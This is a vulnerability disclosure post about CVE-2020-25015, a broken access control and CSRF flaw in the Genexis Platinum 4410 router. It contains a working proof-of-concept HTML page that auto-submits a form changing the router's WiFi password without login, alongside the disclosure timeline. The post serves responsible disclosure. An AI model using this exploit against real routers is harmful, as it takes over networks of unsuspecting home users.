911 Hack Removal

Broken Access Control & CSRF in Genexis Platinum 4410 Router V2.1

Updated on: October 19, 2020

Broken Access Control & CSRF in Genexis Platinum 4410 Router V2.1

While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.

CVE ID: CVE-2020-25015

Summary

Platinum 4410 is a compact router from Genexis that is commonly used at homes. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.

— OWASP

For more information on CSRF, please visit this article.

Impact

An attacker can send the victim a link, which if he clicks while he is connected to the WIFI network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

Vulnerability

Ideally, this attack would be troublesome because for a CSRF attack to be successful, it requires the victim to be logged in to the application that is under the attack (in this case, the web-based setup page at 192.168.1.1) and most router setup pages ends user sessions automatically. Additionally, it is rarely that customers visit their router’s setup page as well. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change password could be sent by unauthenticated parties as well.

Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
      <input type="hidden" name="wlEnbl" value="ON" />
      <input type="hidden" name="hwlKeys0" value="" />
      <input type="hidden" name="hwlKeys1" value="" />
      <input type="hidden" name="hwlKeys2" value="" />
      <input type="hidden" name="hwlKeys3" value="" />
      <input type="hidden" name="hwlgMode" value="9" />
      <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
      <input type="hidden" name="hwlEnbl" value="1" />
      <input type="hidden" name="hWPSMode" value="1" />
      <input type="hidden" name="henableSsid" value="1" />
      <input type="hidden" name="hwlHide" value="0" />
      <input type="hidden" name="isInWPSing" value="0" />
      <input type="hidden" name="WpsConfModeAll" value="7" />
      <input type="hidden" name="WpsConfModeNone" value="0" />
      <input type="hidden" name="hWpsStart" value="0" />
      <input type="hidden" name="isCUCSupport" value="0" />
      <input type="hidden" name="SSIDPre" value="N&#47;A" />
      <input type="hidden" name="bwControlhidden" value="0" />
      <input type="hidden" name="ht&#95;bw" value="1" />
      <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
      <input type="hidden" name="wlChannel" value="0" />
      <input type="hidden" name="wlTxPwr" value="1" />
      <input type="hidden" name="wlSsidIdx" value="0" />
      <input type="hidden" name="SSID&#95;Flag" value="0" />
      <input type="hidden" name="wlSsid" value="JINSON" />
      <input type="hidden" name="wlMcs" value="33" />
      <input type="hidden" name="bwControl" value="1" />
      <input type="hidden" name="giControl" value="1" />
      <input type="hidden" name="enableSsid" value="on" />
      <input type="hidden" name="wlAssociateNum" value="32" />
      <input type="hidden" name="wlSecurMode" value="WPAand11i" />
      <input type="hidden" name="wlPreauth" value="off" />
      <input type="hidden" name="wlNetReauth" value="1" />
      <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
      <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
      <input type="hidden" name="wlWpaGtkRekey" value="" />
      <input type="hidden" name="wlRadiusIPAddr" value="" />
      <input type="hidden" name="wlRadiusPort" value="" />
      <input type="hidden" name="wlRadiusKey" value="" />
      <input type="hidden" name="wlWpa" value="TKIPAES" />
      <input type="hidden" name="wlKeyBit" value="64" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="wlKeys" value="" />
      <input type="hidden" name="WpsActive" value="0" />
      <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
      <input type="hidden" name="pinvalue" value="" />
      <input type="hidden" name="Save&#95;Flag" value="1" />
      <input type="submit" value="Submit request" />
    </form>
     <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

As long as the victim is connected to the WiFi access point established by the affected router, the password of the access point would get changed as shown in the below video.

Timeline

  • Vulnerability reported to the Genexis team on August 28, 2020
  • Team confirmed firmware release containing fix on September 14, 2020

Recommendation

  • As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
  • Use a more secure router if you are unable to upgrade the firmware.

Reference

Tags: , , , , , , , ,

Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include a vulnerability scanner, firewall, malware scanner and pentests to protect your site from the evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany